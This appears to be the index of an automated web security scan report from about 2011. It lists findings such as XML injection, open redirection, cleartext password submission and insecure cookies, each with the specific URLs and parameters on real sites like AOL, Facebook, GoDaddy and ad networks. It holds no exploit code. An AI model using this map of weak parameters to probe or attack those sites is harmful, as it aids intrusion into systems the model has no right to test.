5.206. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.207. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.208. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.209. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.210. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

5.211. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

5.212. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

5.213. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

5.214. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

5.215. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

5.216. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

5.217. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

5.218. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.219. http://aol.com/ [name of an arbitrarily supplied request parameter]

5.220. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.221. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.222. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.223. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.224. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.225. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.226. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.227. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.228. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.229. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.230. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.231. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.232. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.233. http://developer.aol.com/ [name of an arbitrarily supplied request parameter]

5.234. http://engadget.com/ [name of an arbitrarily supplied request parameter]

5.235. http://jsyk.com/ [name of an arbitrarily supplied request parameter]

5.236. http://mmafighting.com/traffic/ [bv parameter]

5.237. http://mmafighting.com/traffic/ [cb parameter]

5.238. http://mmafighting.com/traffic/ [lg parameter]

5.239. http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter]

5.240. http://mmafighting.com/traffic/ [os parameter]

5.241. http://mmafighting.com/traffic/ [pw parameter]

5.242. http://mmafighting.com/traffic/ [rsv parameter]

5.243. http://mmafighting.com/traffic/ [rv parameter]

5.244. http://mmafighting.com/traffic/ [t parameter]

5.245. http://mmafighting.com/traffic/ [tz parameter]

5.246. http://switched.com/ [name of an arbitrarily supplied request parameter]

5.247. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.248. http://walletpop.com/ [name of an arbitrarily supplied request parameter]

5.249. http://www.aol.com/ [dlact cookie]

5.250. http://www.aol.com/ [rrpmo1 cookie]

5.251. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

5.252. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

5.253. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

5.254. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

6. Flash cross-domain policy

6.1. http://a0.twimg.com/crossdomain.xml

6.2. http://about-search.aol.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ads.pointroll.com/crossdomain.xml

6.5. http://ads.undertone.com/crossdomain.xml

6.6. http://adx.adnxs.com/crossdomain.xml

6.7. http://altfarm.mediaplex.com/crossdomain.xml

6.8. http://apartments.rentedspaces.oodle.com/crossdomain.xml

6.9. http://api.bit.ly/crossdomain.xml

6.10. http://api.oscar.aol.com/crossdomain.xml

6.11. http://api.screenname.aol.com/crossdomain.xml

6.12. https://api.screenname.aol.com/crossdomain.xml

6.13. http://ar.voicefive.com/crossdomain.xml

6.14. http://at.atwola.com/crossdomain.xml

6.15. https://at.atwola.com/crossdomain.xml

6.16. http://b.scorecardresearch.com/crossdomain.xml

6.17. http://b.voicefive.com/crossdomain.xml

6.18. http://bongo.zoomin.tv/crossdomain.xml

6.19. http://browser.cdn.aol.com/crossdomain.xml

6.20. http://bs.serving-sys.com/crossdomain.xml

6.21. http://c.brightcove.com/crossdomain.xml

6.22. http://cdn.at.atwola.com/crossdomain.xml

6.23. http://cdn.cinesport.com/crossdomain.xml

6.24. http://cdn.digitalcity.com/crossdomain.xml

6.25. http://cdn.eyewonder.com/crossdomain.xml

6.26. http://cdn4.eyewonder.com/crossdomain.xml

6.27. http://clk.atdmt.com/crossdomain.xml

6.28. http://config.hulu.com/crossdomain.xml

6.29. http://content.mqcdn.com/crossdomain.xml

6.30. http://coverage.mqcdn.com/crossdomain.xml

6.31. http://d.tradex.openx.com/crossdomain.xml

6.32. http://d.xp1.ru4.com/crossdomain.xml

6.33. http://d1.openx.org/crossdomain.xml

6.34. http://daol.aol.com/crossdomain.xml

6.35. http://eatps.web.aol.com:9000/crossdomain.xml

6.36. http://expapi.oscar.aol.com/crossdomain.xml

6.37. http://external.ak.fbcdn.net/crossdomain.xml

6.38. http://fls.doubleclick.net/crossdomain.xml

6.39. http://graph.facebook.com/crossdomain.xml

6.40. http://gravatar.com/crossdomain.xml

6.41. http://ib.adnxs.com/crossdomain.xml

6.42. http://idcs.interclick.com/crossdomain.xml

6.43. http://img-cdn.mediaplex.com/crossdomain.xml

6.44. http://img.mediaplex.com/crossdomain.xml

6.45. http://lifestream.aol.com/crossdomain.xml

6.46. http://log30.doubleverify.com/crossdomain.xml

6.47. http://metrics.apple.com/crossdomain.xml

6.48. http://mobile.aol.com/crossdomain.xml

6.49. http://o.sa.aol.com/crossdomain.xml

6.50. http://pixel.quantserve.com/crossdomain.xml

6.51. http://portal.pf.aol.com/crossdomain.xml

6.52. http://puma.vizu.com/crossdomain.xml

6.53. http://r.unicornmedia.com/crossdomain.xml

6.54. http://r1-ads.ace.advertising.com/crossdomain.xml

6.55. http://s.gravatar.com/crossdomain.xml

6.56. http://s3.cinesport.com/crossdomain.xml

6.57. http://search.twitter.com/crossdomain.xml

6.58. http://secure-us.imrworldwide.com/crossdomain.xml

6.59. http://segment-pixel.invitemedia.com/crossdomain.xml

6.60. http://speed.pointroll.com/crossdomain.xml

6.61. http://sportingnews.122.2o7.net/crossdomain.xml

6.62. http://sportsillustrated.cnn.com/crossdomain.xml

6.63. http://t.mookie1.com/crossdomain.xml

6.64. http://tcr.tynt.com/crossdomain.xml

6.65. http://www.aolcdn.com/crossdomain.xml

6.66. http://www.everydayhealth.com/crossdomain.xml

6.67. http://www.huffingtonpost.com/crossdomain.xml

6.68. http://www.mapquest.com/crossdomain.xml

6.69. http://xml.truveo.com/crossdomain.xml

6.70. http://abcnews.go.com/crossdomain.xml

6.71. http://about.aol.com/crossdomain.xml

6.72. http://ad.wsod.com/crossdomain.xml

6.73. http://add.my.yahoo.com/crossdomain.xml

6.74. http://ads.tw.adsonar.com/crossdomain.xml

6.75. https://adwords.google.com/crossdomain.xml

6.76. http://aol.sportingnews.com/crossdomain.xml

6.77. http://aol.worldwinner.com/crossdomain.xml

6.78. http://api.local.yahoo.com/crossdomain.xml

6.79. http://ar-ar.facebook.com/crossdomain.xml

6.80. http://ax.itunes.apple.com/crossdomain.xml

6.81. http://developers.facebook.com/crossdomain.xml

6.82. http://disqus.com/crossdomain.xml

6.83. http://fantasysource.sportingnews.com/crossdomain.xml

6.84. http://feeds.bbci.co.uk/crossdomain.xml

6.85. http://googleads.g.doubleclick.net/crossdomain.xml

6.86. http://images.apple.com/crossdomain.xml

6.87. http://itunes.apple.com/crossdomain.xml

6.88. http://js.adsonar.com/crossdomain.xml

6.89. http://legal.aol.com/crossdomain.xml

6.90. http://money.cnn.com/crossdomain.xml

6.91. http://music.aol.com/crossdomain.xml

6.92. http://my.screenname.aol.com/crossdomain.xml

6.93. https://my.screenname.aol.com/crossdomain.xml

6.94. http://newsrss.bbc.co.uk/crossdomain.xml

6.95. http://o.aolcdn.com/crossdomain.xml

6.96. http://pagead2.googlesyndication.com/crossdomain.xml

6.97. http://picasaweb.google.com/crossdomain.xml

6.98. http://privacy.aol.com/crossdomain.xml

6.99. http://pubads.g.doubleclick.net/crossdomain.xml

6.100. http://realestate.aol.com/crossdomain.xml

6.101. http://redir.adsonar.com/crossdomain.xml

6.102. https://secure.opinionlab.com/crossdomain.xml

6.103. http://static.ak.fbcdn.net/crossdomain.xml

6.104. http://television.aol.com/crossdomain.xml

6.105. https://us.etrade.com/crossdomain.xml

6.106. http://video.aol.com/crossdomain.xml

6.107. http://video.foxbusiness.com/crossdomain.xml

6.108. http://video.google.com/crossdomain.xml

6.109. http://weather.aol.com/crossdomain.xml

6.110. http://www.aol.com/crossdomain.xml

6.111. http://www.aolnews.com/crossdomain.xml

6.112. http://www.apple.com/crossdomain.xml

6.113. http://www.blogsmithmedia.com/crossdomain.xml

6.114. http://www.citysbest.com/crossdomain.xml

6.115. http://www.dailyfinance.com/crossdomain.xml

6.116. http://www.dooce.com/crossdomain.xml

6.117. http://www.facebook.com/crossdomain.xml

6.118. https://www.facebook.com/crossdomain.xml

6.119. http://www.ft.com/crossdomain.xml

6.120. https://www.godaddy.com/crossdomain.xml

6.121. http://www.ibm.com/crossdomain.xml

6.122. http://www.marketwatch.com/crossdomain.xml

6.123. http://www.mmafighting.com/crossdomain.xml

6.124. http://www.moviefone.com/crossdomain.xml

6.125. http://www.netvibes.com/crossdomain.xml

6.126. http://www.pageflakes.com/crossdomain.xml

6.127. http://www.popeater.com/crossdomain.xml

6.128. http://www.realtytrac.com/crossdomain.xml

6.129. http://www.tuaw.com/crossdomain.xml

6.130. http://aolmobile.aol.com/crossdomain.xml

6.131. http://aolmobile.aolcdn.com/crossdomain.xml

6.132. http://api.twitter.com/crossdomain.xml

6.133. http://citi.bridgetrack.com/crossdomain.xml

6.134. http://docs.google.com/crossdomain.xml

6.135. http://s.stats.wordpress.com/crossdomain.xml

6.136. http://static.twitter.com/crossdomain.xml

6.137. http://stats.wordpress.com/crossdomain.xml

6.138. http://twitter.com/crossdomain.xml

6.139. https://twitter.com/crossdomain.xml

6.140. http://www.truveo.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://ads.pointroll.com/clientaccesspolicy.xml

7.3. http://api.oscar.aol.com/clientaccesspolicy.xml

7.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.5. http://b.voicefive.com/clientaccesspolicy.xml

7.6. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.7. http://clk.atdmt.com/clientaccesspolicy.xml

7.8. http://expapi.oscar.aol.com/clientaccesspolicy.xml

7.9. http://metrics.apple.com/clientaccesspolicy.xml

7.10. http://o.aolcdn.com/clientaccesspolicy.xml

7.11. http://o.sa.aol.com/clientaccesspolicy.xml

7.12. http://s.stats.wordpress.com/clientaccesspolicy.xml

7.13. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.14. http://speed.pointroll.com/clientaccesspolicy.xml

7.15. http://sportingnews.122.2o7.net/clientaccesspolicy.xml

7.16. http://stats.wordpress.com/clientaccesspolicy.xml

7.17. http://www.aol.com/clientaccesspolicy.xml

7.18. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.19. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://appworld.blackberry.com/webstore/content/13833

8.2. http://appworld.blackberry.com/webstore/content/13833

8.3. http://appworld.blackberry.com/webstore/content/13833

8.4. http://appworld.blackberry.com/webstore/content/19143

8.5. http://appworld.blackberry.com/webstore/content/19143

8.6. http://appworld.blackberry.com/webstore/content/19143

8.7. http://digg.com/submit

8.8. http://o.aolcdn.com/art/merge/

8.9. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

8.10. http://top-sec.net/vb/

8.11. http://top-sec.net/vb/calendar.php

8.12. http://top-sec.net/vb/faq.php

8.13. http://top-sec.net/vb/forumdisplay.php

8.14. http://top-sec.net/vb/index.php

8.15. http://top-sec.net/vb/login.php

8.16. http://top-sec.net/vb/member.php

8.17. http://top-sec.net/vb/memberlist.php

8.18. http://top-sec.net/vb/online.php

8.19. http://top-sec.net/vb/online.php

8.20. http://top-sec.net/vb/profile.php

8.21. http://top-sec.net/vb/profile.php

8.22. http://top-sec.net/vb/search.php

8.23. http://top-sec.net/vb/sendmessage.php

8.24. http://top-sec.net/vb/showgroups.php

8.25. http://top-sec.net/vb/showthread.php

8.26. http://top-sec.net/vb/tags.php

8.27. http://www.facebook.com/

8.28. http://www.facebook.com/r.php

8.29. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

8.30. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

9. XML injection

9.1. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1]

9.2. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2]

9.3. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

9.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.5. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.6. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.7. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.8. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.9. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.10. http://use.typekit.com/p/uni0vle.js [REST URL parameter 1]

9.11. http://use.typekit.com/p/uni0vle.js [REST URL parameter 2]

10. SSL cookie without secure flag set

10.1. https://twitter.com/signup

10.2. https://www.fightmagazine.com/mma-magazine/subscribe.asp

10.3. https://www.godaddy.com/

10.4. https://www.godaddy.com/domains/search.aspx

10.5. https://account.login.aol.com/_cqr/opr/opr.psp

10.6. https://aolproductcentral.aol.com/ClickBroker

10.7. https://bill.aol.com/SPortal/jsp/main.jsp

10.8. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp

10.9. https://maps-api-ssl.google.com/maps

10.10. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

10.11. https://my.screenname.aol.com/_cqr/login/jslogin.psp

10.12. https://my.screenname.aol.com/_cqr/login/login.psp

10.13. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

10.14. https://my.screenname.aol.com/badbrowser.psp

10.15. https://us.etrade.com/e/t/welcome/whychooseetrade

10.16. https://www.facebook.com/

10.17. https://www.facebook.com/ajax/intl/language_dialog.php

10.18. https://www.facebook.com/h02332

10.19. https://www.facebook.com/h02332

10.20. https://www.facebook.com/h02332

10.21. https://www.facebook.com/help/contact.php

10.22. https://www.facebook.com/login.php

10.23. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.24. https://www.facebook.com/pages/create.php

10.25. https://www.facebook.com/r.php

10.26. https://www.facebook.com/recover.php

10.27. https://www.godaddy.com/gdshop/hosting/landing.asp

10.28. https://www.godaddy.com/gdshop/registrar/search.asp

10.29. https://www.godaddy.com/gdshop/website.asp

11. Session token in URL

11.1. http://aolmobile.aol.com/registration/include/registration_unified.css

11.2. http://aolmobile.aol.com/registration/welcome

11.3. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

11.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

11.5. http://feedburner.google.com/fb/a/mailverify

11.6. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

11.7. http://weather.aol.com/

11.8. http://www.facebook.com/extern/login_status.php

12. SSL certificate

12.1. https://secure.opinionlab.com/

12.2. https://www.facebook.com/

12.3. https://account.login.aol.com/

12.4. https://adwords.google.com/

12.5. https://aolproductcentral.aol.com/

12.6. https://api.screenname.aol.com/

12.7. https://at.atwola.com/

12.8. https://bill.aol.com/

12.9. https://chrome.google.com/

12.10. https://maps-api-ssl.google.com/

12.11. https://my.screenname.aol.com/

12.12. https://new.aol.com/

12.13. https://rsp.web.aol.com/

12.14. https://spreadsheets.google.com/

12.15. https://twitter.com/

12.16. https://us.etrade.com/

12.17. https://www.fightmagazine.com/

12.18. https://www.godaddy.com/

12.19. https://www.neodata.com/

13. Password field submitted using GET method

13.1. http://digg.com/submit

13.2. http://o.aolcdn.com/art/merge/

14. ASP.NET ViewState without MAC enabled

14.1. http://www.bankrate.com/funnel/mortgages/

14.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

14.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

14.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

14.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

15. Open redirection

15.1. http://b.scorecardresearch.com/r [d.c parameter]

15.2. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://api.twitter.com/

16.2. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

16.3. http://api.twitter.com/1/statuses/show.json

16.4. http://api.twitter.com/1/statuses/user_timeline.json

16.5. http://t.mookie1.com/t/v1/imp

16.6. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

16.7. http://www.mapquest.com/

16.8. http://www.mapquest.com/_svc/ad/getads

16.9. http://www.mapquest.com/_svc/apixel

16.10. http://www.mapquest.com/_svc/publishing/promo

16.11. http://www.mapquest.com/_svc/searchio

16.12. http://www.mapquest.com/cdn/_uac/adpage.htm

16.13. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

16.14. http://www.mapquest.com/icons/stop.png

16.15. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.16. http://abcnews.go.com/Entertainment/popup

16.17. http://add.my.yahoo.com/content

16.18. http://ads.pointroll.com/PortalServe/

16.19. https://adwords.google.com/select/Login

16.20. http://adx.adnxs.com/mapuid

16.21. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2

16.22. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

16.23. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6

16.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

16.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

16.26. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13

16.27. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14

16.28. http://aol.worldwinner.com/cgi/welcome/21sie

16.29. http://aolmobile.aol.com/registration/changeSettings

16.30. http://aolmobile.aol.com/registration/deleteDevice

16.31. http://aolmobile.aol.com/registration/generateConfCode

16.32. http://aolmobile.aol.com/registration/validateConfirmCode

16.33. http://apartments.rentedspaces.oodle.com/

16.34. http://ar-ar.facebook.com/login.php

16.35. http://ar.voicefive.com/b/wc_beacon.pli

16.36. http://ar.voicefive.com/bmx3/broker.pli

16.37. http://ar.voicefive.com/bmx3/broker.pli

16.38. http://b.aol.com/vanity/

16.39. http://b.dailyfinance.com/vanity/

16.40. http://b.huffingtonpost.com/vanity/

16.41. http://b.mmafighting.com/vanity/

16.42. http://b.scorecardresearch.com/b

16.43. http://b.scorecardresearch.com/p

16.44. http://b.scorecardresearch.com/r

16.45. http://b.voicefive.com/b

16.46. http://bid.openx.net/json

16.47. http://blogsearch.google.com/

16.48. http://books.google.com/bkshp

16.49. http://books.google.com/books

16.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.52. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

16.53. http://clk.atdmt.com/CNT/go/319709115/direct

16.54. http://clk.atdmt.com/M0N/go/314366790/direct

16.55. http://clk.atdmt.com/NYC/go/310177527/direct

16.56. http://clk.atdmt.com/go/253735206/direct

16.57. http://clk.atdmt.com/go/253735225/direct

16.58. http://clk.atdmt.com/go/253735228/direct

16.59. http://clk.atdmt.com/go/310177527/direct

16.60. http://clk.atdmt.com/go/314366790/direct

16.61. http://clk.atdmt.com/go/319709115/direct

16.62. http://developers.facebook.com/

16.63. http://developers.facebook.com/plugins/

16.64. http://feedburner.google.com/fb/a/mailverify

16.65. http://fls.doubleclick.net/activityi

16.66. http://fusion.google.com/add

16.67. http://googleads.g.doubleclick.net/aclk

16.68. http://graph.facebook.com/10134017/picture

16.69. http://groups.google.com/grphp

16.70. http://ib.adnxs.com/getuid

16.71. http://ib.adnxs.com/seg

16.72. http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

16.73. http://idcs.interclick.com/Segment.aspx

16.74. http://image3.pubmatic.com/AdServer/UPug

16.75. http://images.apple.com/global/nav/styles/navigation.css

16.76. http://leadback.advertising.com/adcedge/lb

16.77. https://maps-api-ssl.google.com/maps

16.78. http://maps.google.com/maps

16.79. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

16.80. http://picasaweb.google.com/home

16.81. http://picasaweb.google.com/lh/view

16.82. http://pixel.quantserve.com/pixel

16.83. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

16.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

16.85. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

16.86. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

16.87. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

16.88. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

16.89. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

16.90. http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

16.91. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

16.92. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

16.93. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

16.94. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

16.95. http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.96. http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.97. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

16.98. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.99. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.100. http://realestate.aol.com/

16.101. http://scholar.google.com/schhp

16.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

16.103. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713

16.104. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043

16.105. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550

16.106. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095

16.107. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661

16.108. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007

16.109. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465

16.110. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912

16.111. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119

16.112. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650

16.113. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880

16.114. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519

16.115. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624

16.116. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976

16.117. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770

16.118. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648

16.119. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547

16.120. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256

16.121. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970

16.122. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439

16.123. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179

16.124. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412

16.125. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869

16.126. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221

16.127. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715

16.128. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45238099694252

16.129. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45327582890167

16.130. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45334947153460

16.131. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45375636194366

16.132. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45471094280947

